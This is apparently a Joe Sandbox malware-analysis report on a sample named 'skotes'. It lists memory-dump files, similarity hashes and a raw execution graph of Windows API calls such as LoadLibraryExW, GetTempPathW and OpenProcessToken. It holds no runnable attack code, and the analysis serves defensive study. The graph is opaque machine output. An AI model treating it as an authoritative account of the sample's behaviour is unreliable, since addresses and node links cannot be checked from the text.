                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: pScheduler$version
                                                                                                                                                                                                                                          • API String ID: 2141394445-3154422776
                                                                                                                                                                                                                                          • Opcode ID: 2768d0397f3e57f422872a8ccb9d8ac8446359e98a221ef2cf8589b420e013ac
                                                                                                                                                                                                                                          • Instruction ID: a4eba000d5f5d8d3ebbaaf57d393bbffd4f7b7f94957fae29ee91aafac1c306c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2768d0397f3e57f422872a8ccb9d8ac8446359e98a221ef2cf8589b420e013ac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8E02670540348B6CB25FA11C847ADD77AA9B11304F00C019B800112918BB197C8DB81

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:9.6%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:0.6%
                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                          Total number of Limit Nodes:41
                                                                                                                                                                                                                                          execution_graph 16143 7ff67aedccac 16164 7ff67aedce7c 16143->16164 16146 7ff67aedcdf8 16318 7ff67aedd19c IsProcessorFeaturePresent 16146->16318 16147 7ff67aedccc8 __scrt_acquire_startup_lock 16149 7ff67aedce02 16147->16149 16156 7ff67aedcce6 __scrt_release_startup_lock 16147->16156 16150 7ff67aedd19c 7 API calls 16149->16150 16152 7ff67aedce0d __GetCurrentState 16150->16152 16151 7ff67aedcd0b 16153 7ff67aedcd91 16170 7ff67aedd2e4 16153->16170 16155 7ff67aedcd96 16173 7ff67aed1000 16155->16173 16156->16151 16156->16153 16307 7ff67aee9b9c 16156->16307 16161 7ff67aedcdb9 16161->16152 16314 7ff67aedd000 16161->16314 16165 7ff67aedce84 16164->16165 16166 7ff67aedce90 __scrt_dllmain_crt_thread_attach 16165->16166 16167 7ff67aedccc0 16166->16167 16168 7ff67aedce9d 16166->16168 16167->16146 16167->16147 16168->16167 16325 7ff67aedd8f8 16168->16325 16352 7ff67aefa540 16170->16352 16174 7ff67aed1009 16173->16174 16354 7ff67aee54f4 16174->16354 16176 7ff67aed37fb 16361 7ff67aed36b0 16176->16361 16180 7ff67aedc5c0 _log10_special 8 API calls 16182 7ff67aed3ca7 16180->16182 16312 7ff67aedd328 GetModuleHandleW 16182->16312 16183 7ff67aed391b 16537 7ff67aed45b0 16183->16537 16184 7ff67aed383c 16528 7ff67aed1c80 16184->16528 16188 7ff67aed385b 16433 7ff67aed8a20 16188->16433 16189 7ff67aed396a 16560 7ff67aed2710 16189->16560 16193 7ff67aed388e 16200 7ff67aed38bb __vcrt_freefls 16193->16200 16532 7ff67aed8b90 16193->16532 16194 7ff67aed395d 16195 7ff67aed3962 16194->16195 16196 7ff67aed3984 16194->16196 16556 7ff67aee00bc 16195->16556 16199 7ff67aed1c80 49 API calls 16196->16199 16201 7ff67aed39a3 16199->16201 16202 7ff67aed8a20 14 API calls 16200->16202 16210 7ff67aed38de __vcrt_freefls 16200->16210 16206 7ff67aed1950 115 API calls 16201->16206 16202->16210 16203 7ff67aed8b30 40 API calls 16204 7ff67aed3a0b 16203->16204 16205 7ff67aed8b90 40 API calls 16204->16205 16208 7ff67aed3a17 16205->16208 16207 7ff67aed39ce 16206->16207 16207->16188 16209 7ff67aed39de 16207->16209 16211 7ff67aed8b90 40 API calls 16208->16211 16212 7ff67aed2710 54 API calls 16209->16212 16210->16203 16215 7ff67aed390e __vcrt_freefls 16210->16215 16213 7ff67aed3a23 16211->16213 16254 7ff67aed3808 __vcrt_freefls 16212->16254 16214 7ff67aed8b90 40 API calls 16213->16214 16214->16215 16216 7ff67aed8a20 14 API calls 16215->16216 16217 7ff67aed3a3b 16216->16217 16218 7ff67aed3b2f 16217->16218 16219 7ff67aed3a60 __vcrt_freefls 16217->16219 16220 7ff67aed2710 54 API calls 16218->16220 16229 7ff67aed3aab 16219->16229 16446 7ff67aed8b30 16219->16446 16220->16254 16222 7ff67aed8a20 14 API calls 16223 7ff67aed3bf4 __vcrt_freefls 16222->16223 16224 7ff67aed3d41 16223->16224 16225 7ff67aed3c46 16223->16225 16571 7ff67aed44d0 16224->16571 16226 7ff67aed3cd4 16225->16226 16227 7ff67aed3c50 16225->16227 16231 7ff67aed8a20 14 API calls 16226->16231 16453 7ff67aed90e0 16227->16453 16229->16222 16234 7ff67aed3ce0 16231->16234 16232 7ff67aed3d4f 16235 7ff67aed3d65 16232->16235 16236 7ff67aed3d71 16232->16236 16237 7ff67aed3c61 16234->16237 16241 7ff67aed3ced 16234->16241 16574 7ff67aed4620 16235->16574 16239 7ff67aed1c80 49 API calls 16236->16239 16244 7ff67aed2710 54 API calls 16237->16244 16251 7ff67aed3cc8 __vcrt_freefls 16239->16251 16245 7ff67aed1c80 49 API calls 16241->16245 16242 7ff67aed3dc4 16503 7ff67aed9400 16242->16503 16244->16254 16247 7ff67aed3d0b 16245->16247 16250 7ff67aed3d12 16247->16250 16247->16251 16248 7ff67aed3da7 SetDllDirectoryW LoadLibraryExW 16248->16242 16249 7ff67aed3dd7 SetDllDirectoryW 16255 7ff67aed3e0a 16249->16255 16298 7ff67aed3e5a 16249->16298 16253 7ff67aed2710 54 API calls 16250->16253 16251->16242 16251->16248 16253->16254 16254->16180 16257 7ff67aed8a20 14 API calls 16255->16257 16256 7ff67aed3ffc 16259 7ff67aed4006 PostMessageW GetMessageW 16256->16259 16260 7ff67aed4029 16256->16260 16263 7ff67aed3e16 __vcrt_freefls 16257->16263 16258 7ff67aed3f1b 16508 7ff67aed33c0 16258->16508 16259->16260 16651 7ff67aed3360 16260->16651 16265 7ff67aed3ef2 16263->16265 16269 7ff67aed3e4e 16263->16269 16268 7ff67aed8b30 40 API calls 16265->16268 16268->16298 16269->16298 16577 7ff67aed6db0 16269->16577 16298->16256 16298->16258 16308 7ff67aee9bd4 16307->16308 16309 7ff67aee9bb3 16307->16309 16310 7ff67aeea448 45 API calls 16308->16310 16309->16153 16311 7ff67aee9bd9 16310->16311 16313 7ff67aedd339 16312->16313 16313->16161 16315 7ff67aedd011 16314->16315 16316 7ff67aedcdd0 16315->16316 16317 7ff67aedd8f8 7 API calls 16315->16317 16316->16151 16317->16316 16319 7ff67aedd1c2 __GetCurrentState memcpy_s 16318->16319 16320 7ff67aedd1e1 RtlCaptureContext RtlLookupFunctionEntry 16319->16320 16321 7ff67aedd20a RtlVirtualUnwind 16320->16321 16322 7ff67aedd246 memcpy_s 16320->16322 16321->16322 16323 7ff67aedd278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16322->16323 16324 7ff67aedd2c6 __GetCurrentState 16323->16324 16324->16149 16326 7ff67aedd900 16325->16326 16327 7ff67aedd90a 16325->16327 16331 7ff67aeddc94 16326->16331 16327->16167 16332 7ff67aeddca3 16331->16332 16333 7ff67aedd905 16331->16333 16339 7ff67aedded0 16332->16339 16335 7ff67aeddd00 16333->16335 16336 7ff67aeddd2b 16335->16336 16337 7ff67aeddd2f 16336->16337 16338 7ff67aeddd0e DeleteCriticalSection 16336->16338 16337->16327 16338->16336 16343 7ff67aeddd38 16339->16343 16344 7ff67aedde22 TlsFree 16343->16344 16349 7ff67aeddd7c __vcrt_InitializeCriticalSectionEx 16343->16349 16345 7ff67aedddaa LoadLibraryExW 16347 7ff67aedddcb GetLastError 16345->16347 16348 7ff67aedde49 16345->16348 16346 7ff67aedde69 GetProcAddress 16346->16344 16347->16349 16348->16346 16350 7ff67aedde60 FreeLibrary 16348->16350 16349->16344 16349->16345 16349->16346 16351 7ff67aeddded LoadLibraryExW 16349->16351 16350->16346 16351->16348 16351->16349 16353 7ff67aedd2fb GetStartupInfoW 16352->16353 16353->16155 16357 7ff67aeef4f0 16354->16357 16355 7ff67aeef543 16356 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16355->16356 16360 7ff67aeef56c 16356->16360 16357->16355 16358 7ff67aeef596 16357->16358 16664 7ff67aeef3c8 16358->16664 16360->16176 16672 7ff67aedc8c0 16361->16672 16364 7ff67aed3710 16674 7ff67aed92f0 FindFirstFileExW 16364->16674 16365 7ff67aed36eb GetLastError 16679 7ff67aed2c50 16365->16679 16369 7ff67aed3723 16694 7ff67aed9370 CreateFileW 16369->16694 16370 7ff67aed377d 16705 7ff67aed94b0 16370->16705 16372 7ff67aedc5c0 _log10_special 8 API calls 16374 7ff67aed37b5 16372->16374 16374->16254 16383 7ff67aed1950 16374->16383 16376 7ff67aed378b 16380 7ff67aed2810 49 API calls 16376->16380 16382 7ff67aed3706 16376->16382 16377 7ff67aed3734 16697 7ff67aed2810 16377->16697 16379 7ff67aed374c __vcrt_InitializeCriticalSectionEx 16379->16370 16380->16382 16382->16372 16384 7ff67aed45b0 108 API calls 16383->16384 16385 7ff67aed1985 16384->16385 16386 7ff67aed1c43 16385->16386 16387 7ff67aed7f80 83 API calls 16385->16387 16388 7ff67aedc5c0 _log10_special 8 API calls 16386->16388 16390 7ff67aed19cb 16387->16390 16389 7ff67aed1c5e 16388->16389 16389->16183 16389->16184 16432 7ff67aed1a03 16390->16432 17078 7ff67aee0744 16390->17078 16392 7ff67aee00bc 74 API calls 16392->16386 16393 7ff67aed19e5 16394 7ff67aed1a08 16393->16394 16395 7ff67aed19e9 16393->16395 17082 7ff67aee040c 16394->17082 16397 7ff67aee4f78 memcpy_s 11 API calls 16395->16397 16399 7ff67aed19ee 16397->16399 17085 7ff67aed2910 16399->17085 16400 7ff67aed1a45 16406 7ff67aed1a7b 16400->16406 16407 7ff67aed1a5c 16400->16407 16401 7ff67aed1a26 16403 7ff67aee4f78 memcpy_s 11 API calls 16401->16403 16404 7ff67aed1a2b 16403->16404 16405 7ff67aed2910 54 API calls 16404->16405 16405->16432 16408 7ff67aed1c80 49 API calls 16406->16408 16409 7ff67aee4f78 memcpy_s 11 API calls 16407->16409 16410 7ff67aed1a92 16408->16410 16411 7ff67aed1a61 16409->16411 16412 7ff67aed1c80 49 API calls 16410->16412 16413 7ff67aed2910 54 API calls 16411->16413 16414 7ff67aed1add 16412->16414 16413->16432 16415 7ff67aee0744 73 API calls 16414->16415 16416 7ff67aed1b01 16415->16416 16417 7ff67aed1b35 16416->16417 16418 7ff67aed1b16 16416->16418 16419 7ff67aee040c _fread_nolock 53 API calls 16417->16419 16420 7ff67aee4f78 memcpy_s 11 API calls 16418->16420 16421 7ff67aed1b4a 16419->16421 16422 7ff67aed1b1b 16420->16422 16423 7ff67aed1b6f 16421->16423 16424 7ff67aed1b50 16421->16424 16425 7ff67aed2910 54 API calls 16422->16425 17100 7ff67aee0180 16423->17100 16426 7ff67aee4f78 memcpy_s 11 API calls 16424->16426 16425->16432 16428 7ff67aed1b55 16426->16428 16430 7ff67aed2910 54 API calls 16428->16430 16430->16432 16431 7ff67aed2710 54 API calls 16431->16432 16432->16392 16434 7ff67aed8a2a 16433->16434 16435 7ff67aed9400 2 API calls 16434->16435 16436 7ff67aed8a49 GetEnvironmentVariableW 16435->16436 16437 7ff67aed8ab2 16436->16437 16438 7ff67aed8a66 ExpandEnvironmentStringsW 16436->16438 16440 7ff67aedc5c0 _log10_special 8 API calls 16437->16440 16438->16437 16439 7ff67aed8a88 16438->16439 16441 7ff67aed94b0 2 API calls 16439->16441 16442 7ff67aed8ac4 16440->16442 16443 7ff67aed8a9a 16441->16443 16442->16193 16444 7ff67aedc5c0 _log10_special 8 API calls 16443->16444 16445 7ff67aed8aaa 16444->16445 16445->16193 16447 7ff67aed9400 2 API calls 16446->16447 16448 7ff67aed8b4c 16447->16448 16449 7ff67aed9400 2 API calls 16448->16449 16450 7ff67aed8b5c 16449->16450 17318 7ff67aee82a8 16450->17318 16452 7ff67aed8b6a __vcrt_freefls 16452->16229 16454 7ff67aed90f5 16453->16454 17336 7ff67aed8760 GetCurrentProcess OpenProcessToken 16454->17336 16457 7ff67aed8760 7 API calls 16458 7ff67aed9121 16457->16458 16459 7ff67aed9154 16458->16459 16460 7ff67aed913a 16458->16460 16462 7ff67aed26b0 48 API calls 16459->16462 16461 7ff67aed26b0 48 API calls 16460->16461 16463 7ff67aed9152 16461->16463 16464 7ff67aed9167 LocalFree LocalFree 16462->16464 16463->16464 16465 7ff67aed9183 16464->16465 16467 7ff67aed918f 16464->16467 17346 7ff67aed2b50 16465->17346 16468 7ff67aedc5c0 _log10_special 8 API calls 16467->16468 16469 7ff67aed3c55 16468->16469 16469->16237 16470 7ff67aed8850 16469->16470 16471 7ff67aed8868 16470->16471 16472 7ff67aed88ea GetTempPathW GetCurrentProcessId 16471->16472 16473 7ff67aed888c 16471->16473 17355 7ff67aed25c0 16472->17355 16475 7ff67aed8a20 14 API calls 16473->16475 16476 7ff67aed8898 16475->16476 17362 7ff67aed81c0 16476->17362 16483 7ff67aed8918 __vcrt_freefls 16493 7ff67aed8955 __vcrt_freefls 16483->16493 17359 7ff67aee8bd8 16483->17359 16488 7ff67aedc5c0 _log10_special 8 API calls 16489 7ff67aed3cbb 16488->16489 16489->16237 16489->16251 16494 7ff67aed9400 2 API calls 16493->16494 16502 7ff67aed89c4 __vcrt_freefls 16493->16502 16495 7ff67aed89a1 16494->16495 16496 7ff67aed89a6 16495->16496 16497 7ff67aed89d9 16495->16497 16499 7ff67aed9400 2 API calls 16496->16499 16498 7ff67aee82a8 38 API calls 16497->16498 16498->16502 16500 7ff67aed89b6 16499->16500 16502->16488 16504 7ff67aed9422 MultiByteToWideChar 16503->16504 16506 7ff67aed9446 16503->16506 16504->16506 16507 7ff67aed945c __vcrt_freefls 16504->16507 16505 7ff67aed9463 MultiByteToWideChar 16505->16507 16506->16505 16506->16507 16507->16249 16509 7ff67aed33ce memcpy_s 16508->16509 16511 7ff67aed35c7 16509->16511 16514 7ff67aed1c80 49 API calls 16509->16514 16515 7ff67aed35e2 16509->16515 16520 7ff67aed35c9 16509->16520 16522 7ff67aed2a50 54 API calls 16509->16522 16525 7ff67aed35d0 16509->16525 17633 7ff67aed4550 16509->17633 17639 7ff67aed7e10 16509->17639 17651 7ff67aed1600 16509->17651 17699 7ff67aed7110 16509->17699 17703 7ff67aed4180 16509->17703 17747 7ff67aed4440 16509->17747 16510 7ff67aedc5c0 _log10_special 8 API calls 16512 7ff67aed3664 16510->16512 16511->16510 16512->16254 16527 7ff67aed90c0 LocalFree 16512->16527 16514->16509 16517 7ff67aed2710 54 API calls 16515->16517 16517->16511 16521 7ff67aed2710 54 API calls 16520->16521 16521->16511 16522->16509 16526 7ff67aed2710 54 API calls 16525->16526 16526->16511 16529 7ff67aed1ca5 16528->16529 16530 7ff67aee49f4 49 API calls 16529->16530 16531 7ff67aed1cc8 16530->16531 16531->16188 16533 7ff67aed9400 2 API calls 16532->16533 16534 7ff67aed8ba4 16533->16534 16535 7ff67aee82a8 38 API calls 16534->16535 16536 7ff67aed8bb6 __vcrt_freefls 16535->16536 16536->16200 16538 7ff67aed45bc 16537->16538 16539 7ff67aed9400 2 API calls 16538->16539 16540 7ff67aed45e4 16539->16540 16541 7ff67aed9400 2 API calls 16540->16541 16542 7ff67aed45f7 16541->16542 17930 7ff67aee6004 16542->17930 16545 7ff67aedc5c0 _log10_special 8 API calls 16546 7ff67aed392b 16545->16546 16546->16189 16547 7ff67aed7f80 16546->16547 16548 7ff67aed7fa4 16547->16548 16549 7ff67aee0744 73 API calls 16548->16549 16554 7ff67aed807b __vcrt_freefls 16548->16554 16550 7ff67aed7fc0 16549->16550 16550->16554 18321 7ff67aee7938 16550->18321 16552 7ff67aee0744 73 API calls 16555 7ff67aed7fd5 16552->16555 16553 7ff67aee040c _fread_nolock 53 API calls 16553->16555 16554->16194 16555->16552 16555->16553 16555->16554 16557 7ff67aee00ec 16556->16557 18336 7ff67aedfe98 16557->18336 16559 7ff67aee0105 16559->16189 16561 7ff67aedc8c0 16560->16561 16562 7ff67aed2734 GetCurrentProcessId 16561->16562 16563 7ff67aed1c80 49 API calls 16562->16563 16564 7ff67aed2787 16563->16564 16565 7ff67aee49f4 49 API calls 16564->16565 16566 7ff67aed27cf 16565->16566 16567 7ff67aed2620 12 API calls 16566->16567 16568 7ff67aed27f1 16567->16568 16569 7ff67aedc5c0 _log10_special 8 API calls 16568->16569 16570 7ff67aed2801 16569->16570 16570->16254 16572 7ff67aed1c80 49 API calls 16571->16572 16573 7ff67aed44ed 16572->16573 16573->16232 16575 7ff67aed1c80 49 API calls 16574->16575 16576 7ff67aed4650 16575->16576 16576->16251 16578 7ff67aed6dc5 16577->16578 16579 7ff67aed3e6c 16578->16579 16580 7ff67aee4f78 memcpy_s 11 API calls 16578->16580 16583 7ff67aed7330 16579->16583 16581 7ff67aed6dd2 16580->16581 16582 7ff67aed2910 54 API calls 16581->16582 16582->16579 18347 7ff67aed1470 16583->18347 16585 7ff67aed7358 16586 7ff67aed4620 49 API calls 16585->16586 16596 7ff67aed74a9 __vcrt_freefls 16585->16596 16587 7ff67aed737a 16586->16587 18453 7ff67aed6350 16651->18453 16654 7ff67aed3399 16660 7ff67aed3670 16654->16660 16662 7ff67aed367e 16660->16662 16671 7ff67aee54dc EnterCriticalSection 16664->16671 16673 7ff67aed36bc GetModuleFileNameW 16672->16673 16673->16364 16673->16365 16675 7ff67aed932f FindClose 16674->16675 16676 7ff67aed9342 16674->16676 16675->16676 16677 7ff67aedc5c0 _log10_special 8 API calls 16676->16677 16678 7ff67aed371a 16677->16678 16678->16369 16678->16370 16680 7ff67aedc8c0 16679->16680 16681 7ff67aed2c70 GetCurrentProcessId 16680->16681 16710 7ff67aed26b0 16681->16710 16683 7ff67aed2cb9 16714 7ff67aee4c48 16683->16714 16686 7ff67aed26b0 48 API calls 16687 7ff67aed2d34 FormatMessageW 16686->16687 16689 7ff67aed2d7f MessageBoxW 16687->16689 16690 7ff67aed2d6d 16687->16690 16692 7ff67aedc5c0 _log10_special 8 API calls 16689->16692 16691 7ff67aed26b0 48 API calls 16690->16691 16691->16689 16693 7ff67aed2daf 16692->16693 16693->16382 16695 7ff67aed93b0 GetFinalPathNameByHandleW CloseHandle 16694->16695 16696 7ff67aed3730 16694->16696 16695->16696 16696->16377 16696->16379 16698 7ff67aed2834 16697->16698 16699 7ff67aed26b0 48 API calls 16698->16699 16700 7ff67aed2887 16699->16700 16701 7ff67aee4c48 48 API calls 16700->16701 16702 7ff67aed28d0 MessageBoxW 16701->16702 16703 7ff67aedc5c0 _log10_special 8 API calls 16702->16703 16704 7ff67aed2900 16703->16704 16704->16382 16706 7ff67aed94da WideCharToMultiByte 16705->16706 16707 7ff67aed9505 16705->16707 16706->16707 16708 7ff67aed951b __vcrt_freefls 16706->16708 16707->16708 16709 7ff67aed9522 WideCharToMultiByte 16707->16709 16708->16376 16709->16708 16711 7ff67aed26d5 16710->16711 16712 7ff67aee4c48 48 API calls 16711->16712 16713 7ff67aed26f8 16712->16713 16713->16683 16716 7ff67aee4ca2 16714->16716 16715 7ff67aee4cc7 16718 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16715->16718 16716->16715 16717 7ff67aee4d03 16716->16717 16732 7ff67aee3000 16717->16732 16720 7ff67aee4cf1 16718->16720 16721 7ff67aedc5c0 _log10_special 8 API calls 16720->16721 16725 7ff67aed2d04 16721->16725 16722 7ff67aeea9b8 __free_lconv_mon 11 API calls 16722->16720 16724 7ff67aee4db0 16726 7ff67aee4de4 16724->16726 16728 7ff67aee4db9 16724->16728 16725->16686 16726->16722 16727 7ff67aee4e0a 16727->16726 16729 7ff67aee4e14 16727->16729 16730 7ff67aeea9b8 __free_lconv_mon 11 API calls 16728->16730 16731 7ff67aeea9b8 __free_lconv_mon 11 API calls 16729->16731 16730->16720 16731->16720 16733 7ff67aee303e 16732->16733 16738 7ff67aee302e 16732->16738 16734 7ff67aee3047 16733->16734 16739 7ff67aee3075 16733->16739 16737 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16734->16737 16735 7ff67aee306d 16735->16724 16735->16726 16735->16727 16735->16728 16736 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16736->16735 16737->16735 16738->16736 16739->16735 16739->16738 16743 7ff67aee3a14 16739->16743 16776 7ff67aee3460 16739->16776 16813 7ff67aee2bf0 16739->16813 16744 7ff67aee3ac7 16743->16744 16745 7ff67aee3a56 16743->16745 16748 7ff67aee3b20 16744->16748 16749 7ff67aee3acc 16744->16749 16746 7ff67aee3af1 16745->16746 16747 7ff67aee3a5c 16745->16747 16836 7ff67aee1dc4 16746->16836 16750 7ff67aee3a61 16747->16750 16751 7ff67aee3a90 16747->16751 16755 7ff67aee3b37 16748->16755 16758 7ff67aee3b2a 16748->16758 16759 7ff67aee3b2f 16748->16759 16752 7ff67aee3ace 16749->16752 16753 7ff67aee3b01 16749->16753 16750->16755 16756 7ff67aee3a67 16750->16756 16751->16756 16751->16759 16757 7ff67aee3a70 16752->16757 16765 7ff67aee3add 16752->16765 16843 7ff67aee19b4 16753->16843 16850 7ff67aee471c 16755->16850 16756->16757 16763 7ff67aee3aa2 16756->16763 16771 7ff67aee3a8b 16756->16771 16774 7ff67aee3b60 16757->16774 16816 7ff67aee41c8 16757->16816 16758->16746 16758->16759 16759->16774 16854 7ff67aee21d4 16759->16854 16763->16774 16826 7ff67aee4504 16763->16826 16765->16746 16766 7ff67aee3ae2 16765->16766 16766->16774 16832 7ff67aee45c8 16766->16832 16768 7ff67aedc5c0 _log10_special 8 API calls 16770 7ff67aee3e5a 16768->16770 16770->16739 16771->16774 16775 7ff67aee3d4c 16771->16775 16861 7ff67aee4830 16771->16861 16774->16768 16775->16774 16867 7ff67aeeea78 16775->16867 16777 7ff67aee3484 16776->16777 16778 7ff67aee346e 16776->16778 16781 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16777->16781 16782 7ff67aee34c4 16777->16782 16779 7ff67aee3ac7 16778->16779 16780 7ff67aee3a56 16778->16780 16778->16782 16785 7ff67aee3b20 16779->16785 16786 7ff67aee3acc 16779->16786 16783 7ff67aee3af1 16780->16783 16784 7ff67aee3a5c 16780->16784 16781->16782 16782->16739 16791 7ff67aee1dc4 38 API calls 16783->16791 16787 7ff67aee3a61 16784->16787 16788 7ff67aee3a90 16784->16788 16792 7ff67aee3b37 16785->16792 16795 7ff67aee3b2a 16785->16795 16798 7ff67aee3b2f 16785->16798 16789 7ff67aee3ace 16786->16789 16790 7ff67aee3b01 16786->16790 16787->16792 16793 7ff67aee3a67 16787->16793 16788->16793 16788->16798 16794 7ff67aee3a70 16789->16794 16802 7ff67aee3add 16789->16802 16796 7ff67aee19b4 38 API calls 16790->16796 16808 7ff67aee3a8b 16791->16808 16799 7ff67aee471c 45 API calls 16792->16799 16793->16794 16800 7ff67aee3aa2 16793->16800 16793->16808 16797 7ff67aee41c8 47 API calls 16794->16797 16811 7ff67aee3b60 16794->16811 16795->16783 16795->16798 16796->16808 16797->16808 16801 7ff67aee21d4 38 API calls 16798->16801 16798->16811 16799->16808 16804 7ff67aee4504 46 API calls 16800->16804 16800->16811 16801->16808 16802->16783 16803 7ff67aee3ae2 16802->16803 16806 7ff67aee45c8 37 API calls 16803->16806 16803->16811 16804->16808 16805 7ff67aedc5c0 _log10_special 8 API calls 16807 7ff67aee3e5a 16805->16807 16806->16808 16807->16739 16809 7ff67aee4830 45 API calls 16808->16809 16808->16811 16812 7ff67aee3d4c 16808->16812 16809->16812 16810 7ff67aeeea78 46 API calls 16810->16812 16811->16805 16812->16810 16812->16811 17061 7ff67aee1038 16813->17061 16817 7ff67aee41ee 16816->16817 16879 7ff67aee0bf0 16817->16879 16822 7ff67aee4333 16824 7ff67aee4830 45 API calls 16822->16824 16825 7ff67aee43c1 16822->16825 16823 7ff67aee4830 45 API calls 16823->16822 16824->16825 16825->16771 16828 7ff67aee4539 16826->16828 16827 7ff67aee457e 16827->16771 16828->16827 16829 7ff67aee4557 16828->16829 16830 7ff67aee4830 45 API calls 16828->16830 16831 7ff67aeeea78 46 API calls 16829->16831 16830->16829 16831->16827 16835 7ff67aee45e9 16832->16835 16833 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16834 7ff67aee461a 16833->16834 16834->16771 16835->16833 16835->16834 16837 7ff67aee1df7 16836->16837 16838 7ff67aee1e26 16837->16838 16840 7ff67aee1ee3 16837->16840 16842 7ff67aee1e63 16838->16842 17015 7ff67aee0c98 16838->17015 16841 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16840->16841 16841->16842 16842->16771 16844 7ff67aee19e7 16843->16844 16845 7ff67aee1a16 16844->16845 16847 7ff67aee1ad3 16844->16847 16846 7ff67aee0c98 12 API calls 16845->16846 16849 7ff67aee1a53 16845->16849 16846->16849 16848 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16847->16848 16848->16849 16849->16771 16851 7ff67aee475f 16850->16851 16852 7ff67aee4763 __crtLCMapStringW 16851->16852 17023 7ff67aee47b8 16851->17023 16852->16771 16855 7ff67aee2207 16854->16855 16856 7ff67aee2236 16855->16856 16858 7ff67aee22f3 16855->16858 16857 7ff67aee0c98 12 API calls 16856->16857 16860 7ff67aee2273 16856->16860 16857->16860 16859 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16858->16859 16859->16860 16860->16771 16862 7ff67aee4847 16861->16862 17027 7ff67aeeda28 16862->17027 16868 7ff67aeeeaa9 16867->16868 16877 7ff67aeeeab7 16867->16877 16869 7ff67aeeead7 16868->16869 16872 7ff67aee4830 45 API calls 16868->16872 16868->16877 16870 7ff67aeeeb0f 16869->16870 16871 7ff67aeeeae8 16869->16871 16874 7ff67aeeeb9a 16870->16874 16875 7ff67aeeeb39 16870->16875 16870->16877 17051 7ff67aef0110 16871->17051 16872->16869 16876 7ff67aeef910 _fread_nolock MultiByteToWideChar 16874->16876 16875->16877 17054 7ff67aeef910 16875->17054 16876->16877 16877->16775 16880 7ff67aee0c16 16879->16880 16881 7ff67aee0c27 16879->16881 16887 7ff67aeee5e0 16880->16887 16881->16880 16882 7ff67aeed66c _fread_nolock 12 API calls 16881->16882 16883 7ff67aee0c54 16882->16883 16884 7ff67aee0c68 16883->16884 16886 7ff67aeea9b8 __free_lconv_mon 11 API calls 16883->16886 16885 7ff67aeea9b8 __free_lconv_mon 11 API calls 16884->16885 16885->16880 16886->16884 16888 7ff67aeee630 16887->16888 16889 7ff67aeee5fd 16887->16889 16888->16889 16891 7ff67aeee662 16888->16891 16890 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16889->16890 16900 7ff67aee4311 16890->16900 16897 7ff67aeee775 16891->16897 16902 7ff67aeee6aa 16891->16902 16892 7ff67aeee867 16942 7ff67aeedacc 16892->16942 16894 7ff67aeee82d 16935 7ff67aeede64 16894->16935 16896 7ff67aeee7fc 16928 7ff67aeee144 16896->16928 16897->16892 16897->16894 16897->16896 16899 7ff67aeee7bf 16897->16899 16901 7ff67aeee7b5 16897->16901 16918 7ff67aeee374 16899->16918 16900->16822 16900->16823 16901->16894 16904 7ff67aeee7ba 16901->16904 16902->16900 16909 7ff67aeea514 16902->16909 16904->16896 16904->16899 16907 7ff67aeea970 _isindst 17 API calls 16908 7ff67aeee8c4 16907->16908 16910 7ff67aeea521 16909->16910 16911 7ff67aeea52b 16909->16911 16910->16911 16916 7ff67aeea546 16910->16916 16912 7ff67aee4f78 memcpy_s 11 API calls 16911->16912 16913 7ff67aeea532 16912->16913 16914 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 16913->16914 16915 7ff67aeea53e 16914->16915 16915->16900 16915->16907 16916->16915 16917 7ff67aee4f78 memcpy_s 11 API calls 16916->16917 16917->16913 16951 7ff67aef411c 16918->16951 16922 7ff67aeee41c 16923 7ff67aeee471 16922->16923 16924 7ff67aeee420 16922->16924 16925 7ff67aeee43c 16922->16925 17004 7ff67aeedf60 16923->17004 16924->16900 17000 7ff67aeee21c 16925->17000 16929 7ff67aef411c 38 API calls 16928->16929 16930 7ff67aeee18e 16929->16930 16931 7ff67aef3b64 37 API calls 16930->16931 16932 7ff67aeee1de 16931->16932 16933 7ff67aeee1e2 16932->16933 16934 7ff67aeee21c 45 API calls 16932->16934 16933->16900 16934->16933 16936 7ff67aef411c 38 API calls 16935->16936 16937 7ff67aeedeaf 16936->16937 16938 7ff67aef3b64 37 API calls 16937->16938 16939 7ff67aeedf07 16938->16939 16940 7ff67aeedf0b 16939->16940 16941 7ff67aeedf60 45 API calls 16939->16941 16940->16900 16941->16940 16943 7ff67aeedb44 16942->16943 16944 7ff67aeedb11 16942->16944 16945 7ff67aeedb5c 16943->16945 16948 7ff67aeedbdd 16943->16948 16946 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16944->16946 16947 7ff67aeede64 46 API calls 16945->16947 16950 7ff67aeedb3d memcpy_s 16946->16950 16947->16950 16949 7ff67aee4830 45 API calls 16948->16949 16948->16950 16949->16950 16950->16900 16952 7ff67aef416f fegetenv 16951->16952 16953 7ff67aef7e9c 37 API calls 16952->16953 16956 7ff67aef41c2 